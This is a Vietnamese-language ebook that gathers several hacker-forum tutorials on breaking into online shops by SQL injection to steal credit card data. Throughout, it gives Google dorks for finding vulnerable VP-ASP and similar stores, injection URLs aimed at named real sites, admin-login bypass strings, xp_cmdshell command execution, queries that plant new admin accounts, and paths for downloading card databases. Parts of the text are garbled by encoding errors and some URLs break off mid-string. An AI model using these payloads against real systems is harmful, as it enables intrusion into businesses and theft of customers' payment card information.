Hacking Credit Card

Hacking Credit Card

Ebook này được viết ra nhằm mục đích là

học hỏi và chia sẽ kiến thức.

Email: hieuitpc@yahoo.com

Nội dung của ebook: hai tutorials do hieupc viết và một vài tutorials khác do anh em bằng hữu viết, trong đó có một vài tutorials cũ nhưng cũng rất đáng được đưa vào với mục đích để tham khảo.

Hacking Credit Card Version 2.0 - Written by Hieupc

shopdisplayproducts.asp? cat='

Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây

là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trảlời những câu hỏi thắc mắc của các bạn và hieupc cũng đã làm 1 bản Ebook hacking credit card.

Nào giờ chúng ta bắt đầu bắt đầu nhé.

Cách này cũng nhý những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như:OLE DB, JET Database, ASPẦ

Býớc 1:

Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good

Từ khoá nên dùng:

allinurl:Ợshopdisplayproducts.asp?id=

hoặc allinurl:Ợshopdisplayproducts.asp?cat=1 hoặc allinurl:Ợshopdisplayproducts.asp?cat=2ẦẦ

Search shop theo Domain com, net , bizẦ :

allinurl:Ợ.com/shopdisplayproducts.asp?cat=,allinurl:Ợ.net/shopdisplayproducts.asp?cat=

Ai biết chấm gì nữa thì thay vào :)

Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn

Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt đầu hack

Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:

http://www.victim.com/shopdisplayproducts.asp?id=5'

>>> http://www.victim.com/shopdisplayproducts.asp?cat=5'

Uh, nó lỗi ruì kìa:

5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.

catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.

và ðýợc thế? này :

5' union select 1 from tbluser"having 1=1 sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match.

/shop$db.asp, line 467

Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được

Và cứ thế ta cứ tiếp tục thêm số nhé:

http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having%201=1 sp_password

Please review these other products:

Nào giờ chúng ta bắt đầu lấy user and pass:

· fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn

· fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn

Sau khi thêm xong ta sẽ được nhý thế này:

Ta sẽ có user và pass được gộp chung 1 số:

stephenrossi/gnilsur

Bước 3:

Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi.Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũngkhông được

Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳngqua là thay table thôi

Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate,afftemplateMerchant…

Vậy cậu lệnh sẽ thế này:

'%20union%20%20select%

201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password

Thay vào ta sẽ được:

http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select%

201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password

Please review these other products:

Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3,hay 4, hay 22 tuỳ các bạn

'%20union%20%20select%201,2,3,

fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password

Sau khi thêm xong ta sẽ được thế này:

http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,

fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password

Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh,nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.

Hacking Credit Card Version 1.0 - Written by Hieupc

Hack Shop VPASP thật sự là như thế nào?

( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây )

CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member làbiết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặcgóp ý thêm cho mình chỗ nào chưa hoàn chỉnh !

Cách này cũng như những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác nhưOLE DB, JET Database, ASP…

Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật

là hiệu quả Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :))

Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good

Từ khoá nên dùng:

allinurl:”shopdisplayproducts.asp?id=

hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2……

Search shop theo Domain com, net , biz… :

allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id=

Ai biết chấm gì nữa thì thay vào :)

Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack

Bây giờ mình lấy ví dụ shop này nhé:

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1

Oh, 1 em Uk cực ngon không biết có CC

Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` )

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1'

Oh site bị lỗi kìa các bạn :

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.

Khi thêm xong link sẽ như thế này:

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from%20tbluser%27

Oh không dụ gì đây :)

Products

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/chris/shop$db.asp, line 868

Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` )

mà nó hiện ra lỗi như vầy:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ' '.

/product.asp, line 29

Thì các bạn hack theo kiểu hack cũ nhé

Thui bây giờ qua bước 3 nhé, nói nhiều quá :))

Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâuchỉ uể oải 1 tí, đó là thêm số vào code:

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from%20tbluser%27

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from%20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên.

Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :))

Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :))

http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%

201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser

%27

Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22

fldusername <~ thay vào số 4

fldpassword <~ thay vào số 22

Sau khi thay xong link sẽ như thế này:

Phần còn lại là tìm link admin để login, cái này cũng khá quan trọng vì không có link admin làm sao lấy CC :))

Chú ý: link admin để login mặc định của VPASP là : shopadmin.asp cũng có khi ta đánh shopadmin1.asp sẽ vào linkadmin

CÁCH HACK THỨ 2 RÚT RA TỪ BÀI HƯỚNG DẪN CỦA ANH HAI Silveryhat_Hacker :

Bước 1 tương tự như trên:

Oh có lỗi rồi, giờ sao đây :))

Cái này anh em biết khai thác chứ:

http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables)) sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type

int.

/shopping/shopdisplayproducts.asp, line 93

Bước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie.

http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20

Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers'))) sp_password

Khi thêm code xong sẽ như thế này:

http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers'))) sp_password

Và bước tiếp theo:

Code : %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID'))) sp_passwordKhi thêm code xong sẽ như thế này:

http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and

%20column_name%20not%20in%20('AdminID','login'))) sp_password

http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and

Bây giờ kiếm link admin là nhiệm vụ của bạn

TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS

Tutorial ựỏôỉc vieát bôũi kidbandes

What you should look for? (Mục đắch của việc tìm lỗi)

Tìm ra các trang cho phép bạn nhạp dữ liệu, vắ dụ là login page, search page, Thỉnh thoảng, HTML page sử dụng

"Post" command để gởi thông số đến trang ASP khác Vì vậy, bạn không thể thấy thông số trên thanh URL, và xem

"FORM" tag trong HTML code Bạn có thể tìm vài thứ như đoạn code sau:

<FORM action=Search/search.asp method=post>

<input type=hidden name=A value=C>

</FORM>

Mọi thứ giữa <FORM> và </FORM> có thông số lỗi được sử dụng

What if you can't find any page that takes input? Bạn làm gì nếu không tìm đýợc trang nhập liệu nào ?

Bạn nên tìm kiếm trang nhý ASP, JSP, CGI, hay PHP Cố gắng tìm các URL vói các thông số sau:

http://shopping.com/index.asp?id=10

How do you test if it is vulnerable? (Chúng ta kiểm tra lỗi như thế nào)

Bắt đầu với 1 dấu nháy đơn, thêm vào như sau: hi' or

1=1 Nhập vào login hoặc password, hoặc ngay cả URL

<form action=http://shopping.com/search/search.asp method=post>

<input type=hidden name=A value="hi' or 1=1 ">

</form>

Nếu may mắn thì trên site của bạn, bạn sẽ lấy được đăng nhập nhng không co tên đãng nhập và mật mã

Nhưng tại sao dùng 'or 1=1 ?

Chúng ta xem 1 vắ dụ khác tại sao ' or 1=1 lại quan trọng Khác với việc vượt đăng nhập, nó có thể xem nhiều dữ liệuhơn là với các thông tin thông thường Lấy 1 trang ASP bạn sẽ thấy cái link như sau:

http://shopping.com/index.asp?category=food

Trong URL, 'category' là 1 tên biến, và 'food' là giá trị gán cho biến đó Trong trường

hợp đó, 1 trang ASP có thể chứa các đoạn code sau (OK, đây là đoạn code được viết ra cho bài viết này):

v_cat = request("category")

sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"

set rs=conn.execute(sqlstr

Như chúng ta thấy, biến sẽ có giá trị v_cat bên trong và vì vậy câu lệnh SQL sẽ trở thành:

SELECT * FROM product WHERE PCategory='food'

Câu lệnh truy vấn trên sẽ đưa ra tất cả các giá trị với điều kiện là field PCategory là 'food'

Bây giờ câu truy vấn sẽ nhý thế này:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

Phụ thuộc vào câu truy vấn, ta sử dụng các giá trị sau:

How do I get remote execution with SQL injection? (Phương pháp để thực thi lệnh từ xa với SQL)

Để có thể inject(nhập thêm) 1 lệnh SQL, chúng ta có thể thực hiện lệnh Cài đặt mặc ðịnh trên MS SQL chạy dướiquyền SYSTEM, là user với quyền truy cập Aministrator Chúng ta có thể sử dụng để lưu trữ master xp_cmdshell thựchiện lệnh từ xa:

'; exec master xp_cmdshell 'ping

10.10.1.2' Thử dấu (") nếu dấu (') không làm việc

Hai dấu trừ ở cuối dòng lệnh cho phép thực hiện một lệnh SQL mới Ðể kiểm tra rằng câu lệnh này thực hiện được,bạn có thể lắng nghe các gói tin ICMP từ 10.10.1.2, kiểm tra bất kỳ gói tin nào từ server:

#tcpdump icmp

Nếu bạn không nhận ðýợc bất kỳ gói tin từ server, và nhận 1 thông báo lỗi là không ðýợc quyền, thì có thể

Administrator đã giới hạn quyền người dùng truy cập vào hệ thống

How to get output of my SQL query?(Phýõng pháp Lấy kết quả từ câu truy vẫn SQL)

Nếu có thể, bạn sử dụng sp_makewebtask để viết câu truy vấn thành câu lệnh HTML:

'; EXEC master sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Nhưng địa chỉ IP phải có thư mục được share cho tất cả mọi người

How to get data from the database using ODBC error message (Phương pháp Lấy dữ liệu từ CSDL sử dụng lỗi ODBC)Chúng ta sử dụng thủ tục bị lỗi trong Server MS SQL để thực hiện lệnh Xem ví dụ sau:

http://shopping.com/index.asp?id=10

Chúng ta cố gắng kết hợp UNION trong '10' với 1 câu lệnh khác:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

Bảng hệ thống INFORMATION_SCHEMA.TABLES chứa thông tin của tất cả các bảng trong hệ thống

TABLE_NAME field chứa tất cả các tên của bảng trong hệ thống Nó luôn luôn tồn tại theo cách mặc định Câu truyvấn sẽ là:

SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES Ðiều này se trả về bảng đầu tiên trong bảng INFORMATION_SCHEMA_TABLES Khi chúng ta UNION giá trị nàyvới số nguyên 10, MS SQL Server sẽ cố gắng chuyển đổi giá trị chuỗi (nvarchar) thành 1 số nguyên Thủ tục này bịlỗi, bởi vì không thể thục hiện chuyển đổi từ nvarchar thành int Server sẽ xuất hiện lỗi sau:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column ofdata type int

/index.asp, line 5

Thông báo lỗi đủ để biết được là không thể chuyển ðổi giá trị chuỗi thành số Trong trường hợp này, chúng ta có thểlấy được tên table đầu tiên là "table1"

Để lấy table tiếp theo ta có thể sử dụng lệnh sau:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')

Chúng ta cũng có thể sử dụng nó bằng lệnh LIKE:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to acolumn of data type int

/index.asp, line 5

Giá trị trong phù hợp, '%25login%25' sẽ được xem nhý là %login% trong SQL Server Trong trường hợp này, ta có thểlấy tên đầu tiên trong table có giá trị phù hợp là, "admin_login"

How to mine all column names of a table? (Cách lấy tất cả tên cột trong table)

Chúng ta có thể sử dụng table khác INFORMATION_SCHEMA.COLUMNS để ánh xạ tất cả các cột của table:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE

TABLE_NAME='admin_login' Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column

of data type int

/index.asp, line 5

Bây giờ chúng ta có cột đầu tiên trong table, chúng ta sử dụng NOT IN () để lấy cột tiếp theo:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT

IN

('login_id') Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to acolumn of data type int

/index.asp, line 5

Khi chúng ta tiếp tục có thể sẽ thu được một số cột cần thiết như là "password", "details" Chúng ta sẽ biết được nộidung khi sử dụng câu truy vấn sau:

Quote:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT

IN

('login_id','login_name','password',details') Output:

Quote:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statementcontains a UNION operator

/index.asp, line 5

How to retrieve any data we want? (phương pháp lấy tất cả dữ liệu mình muốn)

Bây giờ chúng ta sẽ xem xét 1 số table quan trọng, và các field của nó, Chúng ta cũng sử dụng cùng kỹ thuật trên ðểlấy dữ liệu cần thiết trong CSDL

Bây giờ chúng ta lấy giá trị đầu tiên trong cột login_name từ bảng "admin_login":

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM

admin_login Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to acolumn of data type int

/index.asp, line 5

Tên của user admin là "kidbandes" Cuối cùng chúng ta lấy thêm password của "kidbandes" trong CSDL

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where

login_name='kidbandes' Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'loverthu' to a column

of data type int

/index.asp, line 5

bây giờ chúng ta có thể đãng nhập với tên "kidbandes" và password "lovethu"

How to get numeric string value? (phương pháp lấy giá trị chuỗi s&#7889

Có 1 sự giới hạn trong kỹ thuật ở trên Chúng ta không thể lấy được bất kỳ câu lệnh lỗi nào nếu chúng ta chuyển đổikiểu chuỗi thành bất kỳ kiểu số nào (các ki tự 0-9) Chúng ta cố gắng lấy password của "kimthu" mà nó là số

"123456":

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where

login_name='trinity' Thông thường chúng ta sẽ nhập được thông báo là "Page Not Found" Nguyên nhân ở đây là password của "kimthu" là

"123456" sẽ không thể chuyển đổi, trước UNION với 1 số (10 in this case) bới vì đây là 1 câu lệnh UNION đúng,SQL server sẽ không quãng lỗi ODBC, và vì vậy chúng ta sẽ không thể lấy được thông báo lỗi

Để giải quyết vấn đề này, Chúng ta có thể dùng một ki tu chuỗi để làm cho câu lệnh truy vấn lỗi Chúng ta cố gắngthực hiện câu truy vấn sau:

http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20anhyeuem') FROMadmin_login where login_name='trinity'

Chúng ta sử dụng dấu (+) để kết hợp password với 1 giá trị chuỗi mà chúng ta muốn (ASSCII code for '+' = 0x2b).Chúng ta sẽ kết hợp với '(space)morpheus' thành 1 password thực Vì vậy, ngay cả với password là một chuỗi số'123456', Nó cũng sẽ trở thành '123456 anhyeuem' bằng cách đõn giản gọi lệnh convert(), sau đó cố gắng chuyển đổi'123456 anhyeuem' thành 1 số, SQL Server sẽ xuất hiện lỗi ODBC:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '123456 anhyeuem' to

a column of data type int

/index.asp, line 5

How to update/insert data into the database? (phương pháp Update/Insert dữ liệu vào CSDL)

Khi chúng ta thành công trong việc thu thập thông tin từ CSDL, ðiều này có nghĩa chúng ta có thể UPDATE hoặc ngay

cả INSERT một record mới trong table Ví dụ chúng ta có thể thay password của "kidbandes":

http://shopping.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE

login_name='kidbandes' Để INSERT dữ liệu mới vào CSDL:

http://shopping.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details')VALUES (666,'kidbandes2','lovethu','NA')

Bây giờ chúng ta có thể đăng nhập với "kidbandes2" và password "lovethu"

date : 29/05/2005 TG kidbandes newbie of Thecorrs Family

TUTORIAL FORM jonnyhackstuff

Mức độ nguy hiểm : khá cao

tỷ lệ thành công :80%

Tool :+ site http://google.com.vn/

+ PC của bạn cài Access ( dùng để xem file mdb)

Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D)Tiến hành:

Lên http://google.com.vn/ Search với từ khóa "Powered by DUpaypal -siteduware.com"

bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào

ở đây kieptinhchung chọn cái này:

sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập

thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó

TUTORIAL BY HCEGROUP

I-Lỗi Tek9.asp :

Cách thức tìm : Dùng Google

Câu tìm kiếm : tek9.asp

Kết quả : Bạn tìm các trang web hiện lên , ví dụ làhttp://198.170.250.68/ tek9_login.asp

Bạn sẽ thêm intranet trước tek9.asp

http://198.170.250.68/intranet/tek9_login.asp

Được gì ? Bạn vào trang đăng nhập của người quản trị

Tên và mật khẩu : Đều là 'or''='

Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau Trang trên cho phép bạn quản lý thông số ,kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng Ngòai ra bạn có thể tìm lệnh Find orders

để truy tìm khu vực chức thẻ

============================

II-Lỗi Cart32 v3.5a

Cách thức tìm : Dùng Google

Câu tìm kiếm : Cart32 v3.5a

Kết quả : Chạy các trang web có tập tin cart32.exe Bạn sẽ nhận được 1 số thông tin

Được gì ? Chưa được gì hết

Tên và mật khẩu : Không cần

Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi

-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :

-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên Sau cùng ta

sẽ có giống như thế này :

Câu tìm kiếm : Commerce.cgi

Kết quả : Chạy các trang web có tập tin Commerce.cgi Giả sử bạn kiếm được trang web sau có lỗi

Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu

Tên và mật khẩu : Không cần

Câu tìm kiếm : shopdisplaycategories

Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.aspĐược gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng

Tên và mật khẩu : Không cần

Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )

============================

IV-Lỗi SQL Injection

Cách thức tìm : Dùng Google

Câu tìm kiếm : admentor

Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là 'or''='

Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin

Tên và mật khẩu : 'or''='

Sau đó : Bạn tự tìm hiểu

============================

IV-Lỗi datasources

Cách thức tìm : Dùng Google

Câu tìm kiếm : datasources/ hay config/datasources/

Kết quả :Đường dẫn những trang bị lỗi này

Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/Tên và mật khẩu : Không cần

Sau đó : Bãn tải được kho dữ liệu có credit card

TUTORIAL BY CVHINT

-Lâu rồi không ghé qua diễn đàn chơi sợ anh em nhớNên tui xin góp một bài viết gọi là đóng góp cho diễn đàn tí xíuvới lại về việc hack tôi sẽ không tham gia một thời gian dài nên việc share hết kinh nghiệm háck shop cho anh em chỉcòn là vấn đề thời gian vì vậy ai khoái cái dụ cc thì nên chú ý bài viết này của tôi nhé

Bây giờ chúng ta sẽ đi vào vấn đề chính của bài viết này.Tôi biết hack shop thì ai cũng biết nhưng hack thế nào để có

cc thì rất nhiều người không biết hoặc nếu có thì chưa kịp ăn đã die vì lí do cách hack đó ai cũng biết ( Nếu tôi đoánkhông lầm thì bài viết của Hiếupc ai cũng đọc qua rồi nhỉ ).Thế nên tôi sẽ chỉ cho các bạn một cách hack dạng sql mớichưa phổ biến lắm và ít người hack được

Nhưng xin mọi người cho tui nói vài lời.Tôi đã từng lướt qua các site của viethacker và vào trong box thảo luận về sqlxem thế nào thì có nhiều người cho ý kiến thế này "SQL là một lỗi đã bị lỗi thời".Trùi nghe mà buồi rười rượi

Nói cho các bạn nghe SQL không hề lỗi thời chủ yếu là có biến cái lỗi thời thành lỗi phổ biến của riêng mình haykhông lại là chuyện khác

Thôi nói nhiều mệt quá nên viết bài đây :

Vào google search từ khoá nào mà các bạn biết nhé.Tôi xin đóng góp một vài từ khoá bạn nào biết cái nào thì sharecho mọi người nhé.:

shopcategories.asp?id= /shop/ shopping product.asp?ProductID

rồi search đại một shop giả sử như thế này : www.cvhint.com/shopdisplayproducts.áp?id=1

Rồi khi thêm dấu ' vào nó không ra lỗi thì làm thế nào.Trùi không lẽ nó không có lỗi

Thử là biết ngay thôi.Ta thay cái link khác thử xem sao.Trong vd này tôi thay cái shopdisplayproducts.asp?id=1 =shoptellafriend.asp.asp?id=1

và thêm dấu ' lại xem sao.OOOOOOh lỗi kìa.Good

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'catalogid = 12''

/vshop/shoptellafriend.asp, line 183

Chài vì sao tôi gọi cái này là nâng cao các bạn nên để ý cái line của nó đó.Thường các bạn hack theo bài viết củaHieupc thì chỉ hack được cái line có chỉ số cao thôi còn các line dưới 200 thường thì bó chiếu phải không nào.( Lúctrước tôi gặp hoài à nên hiểu mà)

Tiếp tục dùng truy vấn mà hieupc chỉ cho các bạn đó rà số từ từ sẽ ra một chữ số đặc biệt ở đây thường là số 3 và đây

là kinh nghiệm chiến trường tui share cho anh em đây.:

khi các bạn nhập truy vấn vào thì sẽ ra cái pass và user ở ngay số 3 mà thôi.

Còn link admin thường là shopadmin.asp nhưng cái cách này của tôi nếu lấy link là shopadmin.asp thì hầu như khôngđược.Tôi sẽ chỉ mọi người ở phần tiếp theo còn bây giờ đói rồi đi ăn cái đã.Mong anh em hiểu bài viết này của tôi vàthực hành thành công.Tôi viết không có cái gì gọi là dấu nghề như các bạn khác chỉ cần anh em đọc và hiểu thì sẽ cóshop ngon mà ăn dài dài thôi.Đây là một dạng nâng cao hơi nguy hiểm nên tui không thể đưa ra vd cho các bạn đượcnếu ai có search thấy một site nào đó thì hãy post lên cho mọi người cùng hack.Bye

Bản quyền : cvhint và một người bạn

TUTORIAL FROM VIETHACKER

Các bạn đã nghe rất nhiều từ sql-injection rất nhiều bạn thành thạo nhưng vẫn còn nhiều bạn mới làm wen với lập trìnhweb còn chưa biết tôi xin mạn phép post lại dựa trên các bài về sql-ịnect từ nhóm Vicki , Viethacker.net hay một vàinơi khác

+ SQL Injection là gì?

SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay Bằng cách inject các mã SQLquery/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login (với quyền Admin) mà khôngcần username và password, remote execution, dump data và lấy root của SQL server Công cụ dùng để tấn công là mộttrình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape,

+ Vâng hiểu về SQL-Ịnect đơn giản là chỉ có vậy tôi sẽ phân tích tiếp việc khai thác lỗi đó như thế nào , và mỗi ngườiđều có những cách xử lý riêng

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''

C:\INETPUB\WWWROOT\xxx\INCLUDE\ /lib/dblib.asp, line 95

Thì trang web này bị SQL-Inject chúng ta có thể hoàn toàn khai thác được thông qua việc "Hỏi Đáp" >

Nhiều bạn khi test thấy lỗi như vậy liền dùng câu lệnh lấy hết các bảng , cột trong data:

http://www.xxx.com/item.asp?item_id=1%2bco hema.tables)) Sẽ thu được kết quả là bảng đầu tiên:

